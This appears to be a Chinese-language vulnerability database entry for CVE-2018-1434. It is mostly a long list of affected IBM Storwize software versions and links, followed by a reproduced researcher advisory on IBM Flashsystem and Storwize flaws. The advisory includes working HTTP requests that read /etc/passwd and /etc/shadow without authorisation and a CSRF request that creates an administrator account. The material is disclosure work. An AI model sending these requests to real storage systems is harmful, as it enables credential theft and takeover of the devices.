cpe:/a:ibm:storwize_v5000_software:7.1.0.5
cpe:/a:ibm:storwize_v5000_software:7.1.0.6
cpe:/a:ibm:storwize_v5000_software:7.1.0.7
cpe:/a:ibm:storwize_v5000_software:7.1.0.8
cpe:/a:ibm:storwize_v5000_software:7.1.0.9
cpe:/a:ibm:storwize_v5000_software:7.1.0.10
cpe:/a:ibm:storwize_v5000_software:7.1.0.11
cpe:/a:ibm:storwize_v5000_software:7.1.0.12
cpe:/a:ibm:storwize_v5000_software:7.2.0.0
cpe:/a:ibm:storwize_v5000_software:7.2.0.1
cpe:/a:ibm:storwize_v5000_software:7.2.0.2
cpe:/a:ibm:storwize_v5000_software:7.2.0.3
cpe:/a:ibm:storwize_v5000_software:7.2.0.4
cpe:/a:ibm:storwize_v5000_software:7.2.0.5
cpe:/a:ibm:storwize_v5000_software:7.2.0.6
cpe:/a:ibm:storwize_v5000_software:7.2.0.7
cpe:/a:ibm:storwize_v5000_software:7.2.0.8
cpe:/a:ibm:storwize_v5000_software:7.2.0.9
cpe:/a:ibm:storwize_v5000_software:7.2.0.10
cpe:/a:ibm:storwize_v5000_software:7.2.0.11
cpe:/a:ibm:storwize_v5000_software:7.2.0.12
cpe:/a:ibm:storwize_v5000_software:7.3.0.0
cpe:/a:ibm:storwize_v5000_software:7.3.0.1
cpe:/a:ibm:storwize_v5000_software:7.3.0.2
cpe:/a:ibm:storwize_v5000_software:7.3.0.3
cpe:/a:ibm:storwize_v5000_software:7.3.0.4
cpe:/a:ibm:storwize_v5000_software:7.3.0.5
cpe:/a:ibm:storwize_v5000_software:7.3.0.6
cpe:/a:ibm:storwize_v5000_software:7.3.0.7
cpe:/a:ibm:storwize_v5000_software:7.3.0.8
cpe:/a:ibm:storwize_v5000_software:7.3.0.9
cpe:/a:ibm:storwize_v5000_software:7.3.0.10
cpe:/a:ibm:storwize_v5000_software:7.3.0.11
cpe:/a:ibm:storwize_v5000_software:7.3.0.12
cpe:/a:ibm:storwize_v5000_software:7.3.0.13
cpe:/a:ibm:storwize_v5000_software:7.4.0.0
cpe:/a:ibm:storwize_v5000_software:7.4.0.1
cpe:/a:ibm:storwize_v5000_software:7.4.0.2
cpe:/a:ibm:storwize_v5000_software:7.4.0.3
cpe:/a:ibm:storwize_v5000_software:7.4.0.4
cpe:/a:ibm:storwize_v5000_software:7.4.0.5
cpe:/a:ibm:storwize_v5000_software:7.4.0.6
cpe:/a:ibm:storwize_v5000_software:7.4.0.7
cpe:/a:ibm:storwize_v5000_software:7.4.0.8
cpe:/a:ibm:storwize_v5000_software:7.4.0.9
cpe:/a:ibm:storwize_v5000_software:7.4.0.10
cpe:/a:ibm:storwize_v5000_software:7.4.0.11
cpe:/a:ibm:storwize_v5000_software:7.5.0.0
cpe:/a:ibm:storwize_v5000_software:7.5.0.1
cpe:/a:ibm:storwize_v5000_software:7.5.0.2
cpe:/a:ibm:storwize_v5000_software:7.5.0.3
cpe:/a:ibm:storwize_v5000_software:7.5.0.4
cpe:/a:ibm:storwize_v5000_software:7.5.0.5
cpe:/a:ibm:storwize_v5000_software:7.5.0.6
cpe:/a:ibm:storwize_v5000_software:7.5.0.7
cpe:/a:ibm:storwize_v5000_software:7.5.0.8
cpe:/a:ibm:storwize_v5000_software:7.5.0.9
cpe:/a:ibm:storwize_v5000_software:7.5.0.10
cpe:/a:ibm:storwize_v5000_software:7.5.0.11
cpe:/a:ibm:storwize_v5000_software:7.5.0.12
cpe:/a:ibm:storwize_v5000_software:7.5.0.13
cpe:/a:ibm:storwize_v5000_software:7.6.0.0
cpe:/a:ibm:storwize_v5000_software:7.6.0.1
cpe:/a:ibm:storwize_v5000_software:7.6.0.2
cpe:/a:ibm:storwize_v5000_software:7.6.0.3
cpe:/a:ibm:storwize_v5000_software:7.6.0.4
cpe:/a:ibm:storwize_v5000_software:7.6.1.0
cpe:/a:ibm:storwize_v5000_software:7.6.1.1
cpe:/a:ibm:storwize_v5000_software:7.6.1.2
cpe:/a:ibm:storwize_v5000_software:7.6.1.3
cpe:/a:ibm:storwize_v5000_software:7.6.1.4
cpe:/a:ibm:storwize_v5000_software:7.6.1.5
cpe:/a:ibm:storwize_v5000_software:7.6.1.6
cpe:/a:ibm:storwize_v5000_software:7.6.1.7
cpe:/a:ibm:storwize_v5000_software:7.6.1.8
cpe:/a:ibm:storwize_v5000_software:7.7.0.0
cpe:/a:ibm:storwize_v5000_software:7.7.0.1
cpe:/a:ibm:storwize_v5000_software:7.7.0.2
cpe:/a:ibm:storwize_v5000_software:7.7.0.3
cpe:/a:ibm:storwize_v5000_software:7.7.0.4
cpe:/a:ibm:storwize_v5000_software:7.7.0.5
cpe:/a:ibm:storwize_v5000_software:7.7.1.0
cpe:/a:ibm:storwize_v5000_software:7.7.1.1
cpe:/a:ibm:storwize_v5000_software:7.7.1.2
cpe:/a:ibm:storwize_v5000_software:7.7.1.3
cpe:/a:ibm:storwize_v5000_software:7.7.1.4
cpe:/a:ibm:storwize_v5000_software:7.7.1.5
cpe:/a:ibm:storwize_v5000_software:7.7.1.6
cpe:/a:ibm:storwize_v5000_software:7.7.1.7
cpe:/a:ibm:storwize_v5000_software:7.7.1.8
cpe:/a:ibm:storwize_v5000_software:7.7.1.9
cpe:/a:ibm:storwize_v5000_software:7.8.0.0
cpe:/a:ibm:storwize_v5000_software:7.8.0.1
cpe:/a:ibm:storwize_v5000_software:7.8.0.2
cpe:/a:ibm:storwize_v5000_software:7.8.1.0
cpe:/a:ibm:storwize_v5000_software:7.8.1.1
cpe:/a:ibm:storwize_v5000_software:7.8.1.2
cpe:/a:ibm:storwize_v5000_software:7.8.1.3
cpe:/a:ibm:storwize_v5000_software:7.8.1.4
cpe:/a:ibm:storwize_v5000_software:7.8.1.5
cpe:/a:ibm:storwize_v5000_software:7.8.1.6
cpe:/a:ibm:storwize_v5000_software:8.1.0.0
cpe:/a:ibm:storwize_v5000_software:8.1.0.1
cpe:/a:ibm:storwize_v5000_software:8.1.0.2
cpe:/a:ibm:storwize_v5000_software:8.1.1.0
cpe:/a:ibm:storwize_v5000_software:8.1.1.1
cpe:/a:ibm:storwize_v5000_software:8.1.1.2
cpe:/a:ibm:storwize_v7000_software:6.1.0.0
cpe:/a:ibm:storwize_v7000_software:6.1.0.1
cpe:/a:ibm:storwize_v7000_software:6.1.0.2
cpe:/a:ibm:storwize_v7000_software:6.1.0.3
cpe:/a:ibm:storwize_v7000_software:6.1.0.4
cpe:/a:ibm:storwize_v7000_software:6.1.0.5
cpe:/a:ibm:storwize_v7000_software:6.1.0.6
cpe:/a:ibm:storwize_v7000_software:6.1.0.7
cpe:/a:ibm:storwize_v7000_software:6.1.0.8
cpe:/a:ibm:storwize_v7000_software:6.1.0.9
cpe:/a:ibm:storwize_v7000_software:6.1.0.10
cpe:/a:ibm:storwize_v7000_software:6.2.0.0
cpe:/a:ibm:storwize_v7000_software:6.2.0.1
cpe:/a:ibm:storwize_v7000_software:6.2.0.2
cpe:/a:ibm:storwize_v7000_software:6.2.0.3
cpe:/a:ibm:storwize_v7000_software:6.2.0.4
cpe:/a:ibm:storwize_v7000_software:6.2.0.5
cpe:/a:ibm:storwize_v7000_software:6.2.0.6
cpe:/a:ibm:storwize_v7000_software:6.3.0.0
cpe:/a:ibm:storwize_v7000_software:6.3.0.1
cpe:/a:ibm:storwize_v7000_software:6.3.0.2
cpe:/a:ibm:storwize_v7000_software:6.3.0.3
cpe:/a:ibm:storwize_v7000_software:6.3.0.4
cpe:/a:ibm:storwize_v7000_software:6.3.0.5
cpe:/a:ibm:storwize_v7000_software:6.3.0.6
cpe:/a:ibm:storwize_v7000_software:6.3.0.7
cpe:/a:ibm:storwize_v7000_software:6.4.0.0
cpe:/a:ibm:storwize_v7000_software:6.4.0.1
cpe:/a:ibm:storwize_v7000_software:6.4.0.2
cpe:/a:ibm:storwize_v7000_software:6.4.0.3
cpe:/a:ibm:storwize_v7000_software:6.4.0.4
cpe:/a:ibm:storwize_v7000_software:6.4.1.1
cpe:/a:ibm:storwize_v7000_software:6.4.1.2
cpe:/a:ibm:storwize_v7000_software:6.4.1.3
cpe:/a:ibm:storwize_v7000_software:6.4.1.4
cpe:/a:ibm:storwize_v7000_software:6.4.1.5
cpe:/a:ibm:storwize_v7000_software:6.4.1.6
cpe:/a:ibm:storwize_v7000_software:6.4.1.7
cpe:/a:ibm:storwize_v7000_software:6.4.1.8
cpe:/a:ibm:storwize_v7000_software:6.4.1.9
cpe:/a:ibm:storwize_v7000_software:6.4.1.10
cpe:/a:ibm:storwize_v7000_software:7.1.0.0
cpe:/a:ibm:storwize_v7000_software:7.1.0.1
cpe:/a:ibm:storwize_v7000_software:7.1.0.2
cpe:/a:ibm:storwize_v7000_software:7.1.0.3
cpe:/a:ibm:storwize_v7000_software:7.1.0.4
cpe:/a:ibm:storwize_v7000_software:7.1.0.5
cpe:/a:ibm:storwize_v7000_software:7.1.0.6
cpe:/a:ibm:storwize_v7000_software:7.1.0.7
cpe:/a:ibm:storwize_v7000_software:7.1.0.8
cpe:/a:ibm:storwize_v7000_software:7.1.0.9
cpe:/a:ibm:storwize_v7000_software:7.1.0.10
cpe:/a:ibm:storwize_v7000_software:7.1.0.11
cpe:/a:ibm:storwize_v7000_software:7.1.0.12
cpe:/a:ibm:storwize_v7000_software:7.2.0.0
cpe:/a:ibm:storwize_v7000_software:7.2.0.1
cpe:/a:ibm:storwize_v7000_software:7.2.0.2
cpe:/a:ibm:storwize_v7000_software:7.2.0.3
cpe:/a:ibm:storwize_v7000_software:7.2.0.4
cpe:/a:ibm:storwize_v7000_software:7.2.0.5
cpe:/a:ibm:storwize_v7000_software:7.2.0.6
cpe:/a:ibm:storwize_v7000_software:7.2.0.7
cpe:/a:ibm:storwize_v7000_software:7.2.0.8
cpe:/a:ibm:storwize_v7000_software:7.2.0.9
cpe:/a:ibm:storwize_v7000_software:7.2.0.10
cpe:/a:ibm:storwize_v7000_software:7.2.0.11
cpe:/a:ibm:storwize_v7000_software:7.2.0.12
cpe:/a:ibm:storwize_v7000_software:7.3.0.0
cpe:/a:ibm:storwize_v7000_software:7.3.0.1
cpe:/a:ibm:storwize_v7000_software:7.3.0.2
cpe:/a:ibm:storwize_v7000_software:7.3.0.3
cpe:/a:ibm:storwize_v7000_software:7.3.0.4
cpe:/a:ibm:storwize_v7000_software:7.3.0.5
cpe:/a:ibm:storwize_v7000_software:7.3.0.6
cpe:/a:ibm:storwize_v7000_software:7.3.0.7
cpe:/a:ibm:storwize_v7000_software:7.3.0.8
cpe:/a:ibm:storwize_v7000_software:7.3.0.9
cpe:/a:ibm:storwize_v7000_software:7.3.0.10
cpe:/a:ibm:storwize_v7000_software:7.3.0.11
cpe:/a:ibm:storwize_v7000_software:7.3.0.12
cpe:/a:ibm:storwize_v7000_software:7.3.0.13
cpe:/a:ibm:storwize_v7000_software:7.4.0.0
cpe:/a:ibm:storwize_v7000_software:7.4.0.1
cpe:/a:ibm:storwize_v7000_software:7.4.0.2
cpe:/a:ibm:storwize_v7000_software:7.4.0.3
cpe:/a:ibm:storwize_v7000_software:7.4.0.4
cpe:/a:ibm:storwize_v7000_software:7.4.0.5
cpe:/a:ibm:storwize_v7000_software:7.4.0.6
cpe:/a:ibm:storwize_v7000_software:7.4.0.7
cpe:/a:ibm:storwize_v7000_software:7.4.0.8
cpe:/a:ibm:storwize_v7000_software:7.4.0.9
cpe:/a:ibm:storwize_v7000_software:7.4.0.10
cpe:/a:ibm:storwize_v7000_software:7.4.0.11
cpe:/a:ibm:storwize_v7000_software:7.5.0.0
cpe:/a:ibm:storwize_v7000_software:7.5.0.1
cpe:/a:ibm:storwize_v7000_software:7.5.0.2
cpe:/a:ibm:storwize_v7000_software:7.5.0.3
cpe:/a:ibm:storwize_v7000_software:7.5.0.4
cpe:/a:ibm:storwize_v7000_software:7.5.0.5
cpe:/a:ibm:storwize_v7000_software:7.5.0.6
cpe:/a:ibm:storwize_v7000_software:7.5.0.7
cpe:/a:ibm:storwize_v7000_software:7.5.0.8
cpe:/a:ibm:storwize_v7000_software:7.5.0.9
cpe:/a:ibm:storwize_v7000_software:7.5.0.10
cpe:/a:ibm:storwize_v7000_software:7.5.0.11
cpe:/a:ibm:storwize_v7000_software:7.5.0.12
cpe:/a:ibm:storwize_v7000_software:7.5.0.13
cpe:/a:ibm:storwize_v7000_software:7.6.0.0
cpe:/a:ibm:storwize_v7000_software:7.6.0.1
cpe:/a:ibm:storwize_v7000_software:7.6.0.2
cpe:/a:ibm:storwize_v7000_software:7.6.0.3
cpe:/a:ibm:storwize_v7000_software:7.6.0.4
cpe:/a:ibm:storwize_v7000_software:7.6.1.0
cpe:/a:ibm:storwize_v7000_software:7.6.1.1
cpe:/a:ibm:storwize_v7000_software:7.6.1.2
cpe:/a:ibm:storwize_v7000_software:7.6.1.3
cpe:/a:ibm:storwize_v7000_software:7.6.1.4
cpe:/a:ibm:storwize_v7000_software:7.6.1.5
cpe:/a:ibm:storwize_v7000_software:7.6.1.6
cpe:/a:ibm:storwize_v7000_software:7.6.1.7
cpe:/a:ibm:storwize_v7000_software:7.6.1.8
cpe:/a:ibm:storwize_v7000_software:7.7.0.0
cpe:/a:ibm:storwize_v7000_software:7.7.0.1
cpe:/a:ibm:storwize_v7000_software:7.7.0.2
cpe:/a:ibm:storwize_v7000_software:7.7.0.3
cpe:/a:ibm:storwize_v7000_software:7.7.0.4
cpe:/a:ibm:storwize_v7000_software:7.7.0.5
cpe:/a:ibm:storwize_v7000_software:7.7.1.0
cpe:/a:ibm:storwize_v7000_software:7.7.1.1
cpe:/a:ibm:storwize_v7000_software:7.7.1.2
cpe:/a:ibm:storwize_v7000_software:7.7.1.3
cpe:/a:ibm:storwize_v7000_software:7.7.1.4
cpe:/a:ibm:storwize_v7000_software:7.7.1.5
cpe:/a:ibm:storwize_v7000_software:7.7.1.6
cpe:/a:ibm:storwize_v7000_software:7.7.1.7
cpe:/a:ibm:storwize_v7000_software:7.7.1.8
cpe:/a:ibm:storwize_v7000_software:7.7.1.9
cpe:/a:ibm:storwize_v7000_software:7.8.0.0
cpe:/a:ibm:storwize_v7000_software:7.8.0.1
cpe:/a:ibm:storwize_v7000_software:7.8.0.2
cpe:/a:ibm:storwize_v7000_software:7.8.1.0
cpe:/a:ibm:storwize_v7000_software:7.8.1.1
cpe:/a:ibm:storwize_v7000_software:7.8.1.2
cpe:/a:ibm:storwize_v7000_software:7.8.1.3
cpe:/a:ibm:storwize_v7000_software:7.8.1.4
cpe:/a:ibm:storwize_v7000_software:7.8.1.5
cpe:/a:ibm:storwize_v7000_software:7.8.1.6
cpe:/a:ibm:storwize_v7000_software:8.1.0.0
cpe:/a:ibm:storwize_v7000_software:8.1.0.1
cpe:/a:ibm:storwize_v7000_software:8.1.0.2
cpe:/a:ibm:storwize_v7000_software:8.1.1.0
cpe:/a:ibm:storwize_v7000_software:8.1.1.1
cpe:/a:ibm:storwize_v7000_software:8.1.1.2
cpe:/a:ibm:storwize_v9000_software:6.1.0.0
cpe:/a:ibm:storwize_v9000_software:6.1.0.1
cpe:/a:ibm:storwize_v9000_software:6.1.0.2
cpe:/a:ibm:storwize_v9000_software:6.1.0.3
cpe:/a:ibm:storwize_v9000_software:6.1.0.4
cpe:/a:ibm:storwize_v9000_software:6.1.0.5
cpe:/a:ibm:storwize_v9000_software:6.1.0.6
cpe:/a:ibm:storwize_v9000_software:6.1.0.7
cpe:/a:ibm:storwize_v9000_software:6.1.0.8
cpe:/a:ibm:storwize_v9000_software:6.1.0.9
cpe:/a:ibm:storwize_v9000_software:6.1.0.10
cpe:/a:ibm:storwize_v9000_software:6.2.0.0
cpe:/a:ibm:storwize_v9000_software:6.2.0.1
cpe:/a:ibm:storwize_v9000_software:6.2.0.2
cpe:/a:ibm:storwize_v9000_software:6.2.0.3
cpe:/a:ibm:storwize_v9000_software:6.2.0.4
cpe:/a:ibm:storwize_v9000_software:6.2.0.5
cpe:/a:ibm:storwize_v9000_software:6.2.0.6
cpe:/a:ibm:storwize_v9000_software:6.3.0.0
cpe:/a:ibm:storwize_v9000_software:6.3.0.1
cpe:/a:ibm:storwize_v9000_software:6.3.0.2
cpe:/a:ibm:storwize_v9000_software:6.3.0.3
cpe:/a:ibm:storwize_v9000_software:6.3.0.4
cpe:/a:ibm:storwize_v9000_software:6.3.0.5
cpe:/a:ibm:storwize_v9000_software:6.3.0.6
cpe:/a:ibm:storwize_v9000_software:6.3.0.7
cpe:/a:ibm:storwize_v9000_software:6.4.0.0
cpe:/a:ibm:storwize_v9000_software:6.4.0.1
cpe:/a:ibm:storwize_v9000_software:6.4.0.2
cpe:/a:ibm:storwize_v9000_software:6.4.0.3
cpe:/a:ibm:storwize_v9000_software:6.4.0.4
cpe:/a:ibm:storwize_v9000_software:6.4.1.1
cpe:/a:ibm:storwize_v9000_software:6.4.1.2
cpe:/a:ibm:storwize_v9000_software:6.4.1.3
cpe:/a:ibm:storwize_v9000_software:6.4.1.4
cpe:/a:ibm:storwize_v9000_software:6.4.1.5
cpe:/a:ibm:storwize_v9000_software:6.4.1.6
cpe:/a:ibm:storwize_v9000_software:6.4.1.7
cpe:/a:ibm:storwize_v9000_software:6.4.1.8
cpe:/a:ibm:storwize_v9000_software:6.4.1.9
cpe:/a:ibm:storwize_v9000_software:6.4.1.10
cpe:/a:ibm:storwize_v9000_software:7.1.0.0
cpe:/a:ibm:storwize_v9000_software:7.1.0.1
cpe:/a:ibm:storwize_v9000_software:7.1.0.2
cpe:/a:ibm:storwize_v9000_software:7.1.0.3
cpe:/a:ibm:storwize_v9000_software:7.1.0.4
cpe:/a:ibm:storwize_v9000_software:7.1.0.5
cpe:/a:ibm:storwize_v9000_software:7.1.0.6
cpe:/a:ibm:storwize_v9000_software:7.1.0.7
cpe:/a:ibm:storwize_v9000_software:7.1.0.8
cpe:/a:ibm:storwize_v9000_software:7.1.0.9
cpe:/a:ibm:storwize_v9000_software:7.1.0.10
cpe:/a:ibm:storwize_v9000_software:7.1.0.11
cpe:/a:ibm:storwize_v9000_software:7.1.0.12
cpe:/a:ibm:storwize_v9000_software:7.2.0.0
cpe:/a:ibm:storwize_v9000_software:7.2.0.1
cpe:/a:ibm:storwize_v9000_software:7.2.0.2
cpe:/a:ibm:storwize_v9000_software:7.2.0.3
cpe:/a:ibm:storwize_v9000_software:7.2.0.4
cpe:/a:ibm:storwize_v9000_software:7.2.0.5
cpe:/a:ibm:storwize_v9000_software:7.2.0.6
cpe:/a:ibm:storwize_v9000_software:7.2.0.7
cpe:/a:ibm:storwize_v9000_software:7.2.0.8
cpe:/a:ibm:storwize_v9000_software:7.2.0.9
cpe:/a:ibm:storwize_v9000_software:7.2.0.10
cpe:/a:ibm:storwize_v9000_software:7.2.0.11
cpe:/a:ibm:storwize_v9000_software:7.2.0.12
cpe:/a:ibm:storwize_v9000_software:7.3.0.0
cpe:/a:ibm:storwize_v9000_software:7.3.0.1
cpe:/a:ibm:storwize_v9000_software:7.3.0.2
cpe:/a:ibm:storwize_v9000_software:7.3.0.3
cpe:/a:ibm:storwize_v9000_software:7.3.0.4
cpe:/a:ibm:storwize_v9000_software:7.3.0.5
cpe:/a:ibm:storwize_v9000_software:7.3.0.6
cpe:/a:ibm:storwize_v9000_software:7.3.0.7
cpe:/a:ibm:storwize_v9000_software:7.3.0.8
cpe:/a:ibm:storwize_v9000_software:7.3.0.9
cpe:/a:ibm:storwize_v9000_software:7.3.0.10
cpe:/a:ibm:storwize_v9000_software:7.3.0.11
cpe:/a:ibm:storwize_v9000_software:7.3.0.12
cpe:/a:ibm:storwize_v9000_software:7.3.0.13
cpe:/a:ibm:storwize_v9000_software:7.4.0.0
cpe:/a:ibm:storwize_v9000_software:7.4.0.1
cpe:/a:ibm:storwize_v9000_software:7.4.0.2
cpe:/a:ibm:storwize_v9000_software:7.4.0.3
cpe:/a:ibm:storwize_v9000_software:7.4.0.4
cpe:/a:ibm:storwize_v9000_software:7.4.0.5
cpe:/a:ibm:storwize_v9000_software:7.4.0.6
cpe:/a:ibm:storwize_v9000_software:7.4.0.7
cpe:/a:ibm:storwize_v9000_software:7.4.0.8
cpe:/a:ibm:storwize_v9000_software:7.4.0.9
cpe:/a:ibm:storwize_v9000_software:7.4.0.10
cpe:/a:ibm:storwize_v9000_software:7.4.0.11
cpe:/a:ibm:storwize_v9000_software:7.5.0.0
cpe:/a:ibm:storwize_v9000_software:7.5.0.1
cpe:/a:ibm:storwize_v9000_software:7.5.0.2
cpe:/a:ibm:storwize_v9000_software:7.5.0.3
cpe:/a:ibm:storwize_v9000_software:7.5.0.4
cpe:/a:ibm:storwize_v9000_software:7.5.0.5
cpe:/a:ibm:storwize_v9000_software:7.5.0.6
cpe:/a:ibm:storwize_v9000_software:7.5.0.7
cpe:/a:ibm:storwize_v9000_software:7.5.0.8
cpe:/a:ibm:storwize_v9000_software:7.5.0.9
cpe:/a:ibm:storwize_v9000_software:7.5.0.10
cpe:/a:ibm:storwize_v9000_software:7.5.0.11
cpe:/a:ibm:storwize_v9000_software:7.5.0.12
cpe:/a:ibm:storwize_v9000_software:7.5.0.13
cpe:/a:ibm:storwize_v9000_software:7.6.0.0
cpe:/a:ibm:storwize_v9000_software:7.6.0.1
cpe:/a:ibm:storwize_v9000_software:7.6.0.2
cpe:/a:ibm:storwize_v9000_software:7.6.0.3
cpe:/a:ibm:storwize_v9000_software:7.6.0.4
cpe:/a:ibm:storwize_v9000_software:7.6.1.0
cpe:/a:ibm:storwize_v9000_software:7.6.1.1
cpe:/a:ibm:storwize_v9000_software:7.6.1.2
cpe:/a:ibm:storwize_v9000_software:7.6.1.3
cpe:/a:ibm:storwize_v9000_software:7.6.1.4
cpe:/a:ibm:storwize_v9000_software:7.6.1.5
cpe:/a:ibm:storwize_v9000_software:7.6.1.6
cpe:/a:ibm:storwize_v9000_software:7.6.1.7
cpe:/a:ibm:storwize_v9000_software:7.6.1.8
cpe:/a:ibm:storwize_v9000_software:7.7.0.0
cpe:/a:ibm:storwize_v9000_software:7.7.0.1
cpe:/a:ibm:storwize_v9000_software:7.7.0.2
cpe:/a:ibm:storwize_v9000_software:7.7.0.3
cpe:/a:ibm:storwize_v9000_software:7.7.0.4
cpe:/a:ibm:storwize_v9000_software:7.7.0.5
cpe:/a:ibm:storwize_v9000_software:7.7.1.0
cpe:/a:ibm:storwize_v9000_software:7.7.1.1
cpe:/a:ibm:storwize_v9000_software:7.7.1.2
cpe:/a:ibm:storwize_v9000_software:7.7.1.3
cpe:/a:ibm:storwize_v9000_software:7.7.1.4
cpe:/a:ibm:storwize_v9000_software:7.7.1.5
cpe:/a:ibm:storwize_v9000_software:7.7.1.6
cpe:/a:ibm:storwize_v9000_software:7.7.1.7
cpe:/a:ibm:storwize_v9000_software:7.7.1.8
cpe:/a:ibm:storwize_v9000_software:7.7.1.9
cpe:/a:ibm:storwize_v9000_software:7.8.0.0
cpe:/a:ibm:storwize_v9000_software:7.8.0.1
cpe:/a:ibm:storwize_v9000_software:7.8.0.2
cpe:/a:ibm:storwize_v9000_software:7.8.1.0
cpe:/a:ibm:storwize_v9000_software:7.8.1.1
cpe:/a:ibm:storwize_v9000_software:7.8.1.2
cpe:/a:ibm:storwize_v9000_software:7.8.1.3
cpe:/a:ibm:storwize_v9000_software:7.8.1.4
cpe:/a:ibm:storwize_v9000_software:7.8.1.5
cpe:/a:ibm:storwize_v9000_software:7.8.1.6
cpe:/a:ibm:storwize_v9000_software:8.1.0.0
cpe:/a:ibm:storwize_v9000_software:8.1.0.1
cpe:/a:ibm:storwize_v9000_software:8.1.0.2
cpe:/a:ibm:storwize_v9000_software:8.1.1.0
cpe:/a:ibm:storwize_v9000_software:8.1.1.1
cpe:/a:ibm:storwize_v9000_software:8.1.1.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1434
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1434
(官方数据源) NVD

- 其它链接及资源

http://www.ibm.com/support/docview.wss?uid=ssg1S1012263
(VENDOR_ADVISORY)  CONFIRM  http://www.ibm.com/support/docview.wss?uid=ssg1S1012263
http://www.ibm.com/support/docview.wss?uid=ssg1S1012282
(VENDOR_ADVISORY)  CONFIRM  http://www.ibm.com/support/docview.wss?uid=ssg1S1012282
http://www.ibm.com/support/docview.wss?uid=ssg1S1012283
(VENDOR_ADVISORY)  CONFIRM  http://www.ibm.com/support/docview.wss?uid=ssg1S1012283
http://www.securityfocus.com/bid/104349
(VENDOR_ADVISORY)  BID  104349
https://exchange.xforce.ibmcloud.com/vulnerabilities/139474
(VENDOR_ADVISORY)  XF  ibm-storwize-cve20181434-csrf(139474)

- 漏洞信息 (F147601)

IBM Flashsystem / Storwize CSRF / Arbitrary File Read / Information Disclosure (PacketStormID:F147601)
2018-05-14 00:00:00
Jan Bee,Sebastian Neuner  
exploit,arbitrary,vulnerability,csrf
CVE-2018-1433,CVE-2018-1434,CVE-2018-1438,CVE-2018-1461,CVE-2018-1462,CVE-2018-1463,CVE-2018-1464,CVE-2018-1465,CVE-2018-1466,CVE-2018-1467,CVE-2018-1495
[点击下载]

Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem 900 and IBM Storwize V7000. They include cross site request forgery, arbitrary file read, unauthenticated access, and various other vulnerabilities.

Vulnerabilities in IBMs Flashsystems and Storwize Products
-------------------------------------------------------------------------

Introduction
============
Vulnerabilities were identified in the IBM Flashsystem 840, IBM Flashsystem
900 and IBM Storwize V7000. These were discovered during a black box
assessment and therefore the vulnerability list should not be considered
exhaustive; observations suggest that it is likely that further
vulnerabilities exist. It is strongly recommended that IBM Corporation
undertakes a full whitebox security assessment of this application.

The version under test was indicated as: 1.6.2.2 build 18

Affected Software And Versions
==============================
- IBM Flashsystem 900
- IBM Flashsystem 840
- IBM Storwize V7000

Affected versions are indicated directly within the reported issues.

CVE
===
The following CVEs were assigned to the issues described in this report:
CVE-2018-1438
CVE-2018-1433
CVE-2018-1434
CVE-2018-1462
CVE-2018-1463
CVE-2018-1464
CVE-2018-1495
CVE-2018-1467
CVE-2018-1465
CVE-2018-1466
CVE-2018-1461

Vulnerability Overview
======================
   01. CVE-2018-1438: Unauthenticated arbitrary file read on V7000 Unified
allowing storage data access
   02. CVE-2018-1433: Unauthenticated arbitrary file read via the
DownloadFile Handler / Authenticated arbitrary file read via the
DownloadFile Handler on v7000 Unified
   03. CVE-2018-1434: Web interface vulnerable to CSRF
   04. CVE-2018-1462: rBash ineffective as a security measure
   05. CVE-2018-1463: World readable credentials and encryption keys
   06. CVE-2018-1464: Sensitive file disclosure of files readable by root
   07. CVE-2018-1495: Arbitrary file overwrite
   08. CVE-2018-1467: Unauthenticated information disclosure
   09. CVE-2018-1465: Unprivileged web server process may read SSL private
key
   10. CVE-2018-1466: Weak password hashing algorithm used
   11. CVE-2018-1461: Missing Security Related HTTP Headers


Vulnerability Details
=====================

---------------------------------------------
CVE-2018-1438. Unauthenticated arbitrary file read on V7000 Unified
allowing storage data access
---------------------------------------------

On the IBM V7000 Unified System the web handler /DLSnap does not require
authentication and allows to read arbitrary files from the system as
"root", including the data stored in the storage system from the mounted
shares.

GET /DLSnap?filename=/ibm/<redacted>/secret-file.txt HTTP/1.1
Host: v7ku01
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control:
Expires: Wed, 31 Dec 1969 16:00:00 PST
X-Frame-Options: SAMEORIGIN
Set-Cookie: SonasSessionID=<redacted>; Path=/; Secure; HttpOnly
Content-disposition: attachment; filename=secret-file.txt
Pragma:
Content-Type: application/octet-stream
Date: Tue, 16 Jan 2018 11:12:39 GMT
Connection: close
Content-Length: 4

42

--------------------------------------------------
CVE-2018-1433. Unauthenticated file read via the DownloadFile Handler /
Authenticated arbitrary file read via the DownloadFile Handler on v7000
Unified
--------------------------------------------------


In case of the following list of products, the DownloadFile handler allows
unauthenticated file reading under the "webadmin" user:
IBM Flashsystem 900
IBM Flashsystem 840
IBM Storwize V7000

Example request:
GET /DownloadFile?filename=/etc/passwd HTTP/1.1
Host: v7k01n02
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

On the V7000 Unified the same request handler allows reading arbitrary
files under the "root" user, however authentication is required here:
GET /DownloadFile?filename=/etc/shadow
Host: v7ku01
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: <redacted>

-----------------------------------------------
CVE-2018-1434: Web interface vulnerable to CSRF
-----------------------------------------------

The main web interface on the V7000 Unified is vulnerable to CSRF and other
interfaces seem to be vulnerable as well. This could allow an external
attacker to execute commands on behalf of a user/administrator of the
system and potentially also access data stored on the system.

Example request (using a cross domain XMLHttpRequest):
POST /RPCAdapter HTTP/1.1
Host: v7ku01
Origin: https://www.example.com
Referer: https://www.example.com/create_admin.html
Content-Type: text/plain
Connection: close
Content-Length: 183
Cookie: <redacted>

{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.sonas.gui.logic.AccessRPC","methodName":"launchCreateUserTask","methodArgs":["my-secadmin","<redacted>",["Administrator"]]}


Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN
Content-Type: application/json;charset=UTF-8
Content-Length: 319
Connection: close

{"clazz":"com.ibm.evo.rpc.RPCResponse","messages":null,"result":{"clazz":"com.ibm.sonas.gui.logic.tasks.access.CreateUserTask","shouldBeScheduled":true,"started":1516202190188,"id":"<redacted>","name":"Create
User", "state":"Running","status":"Task
started.","progress":-1,"returnValue": null}}

---------------------------------------------
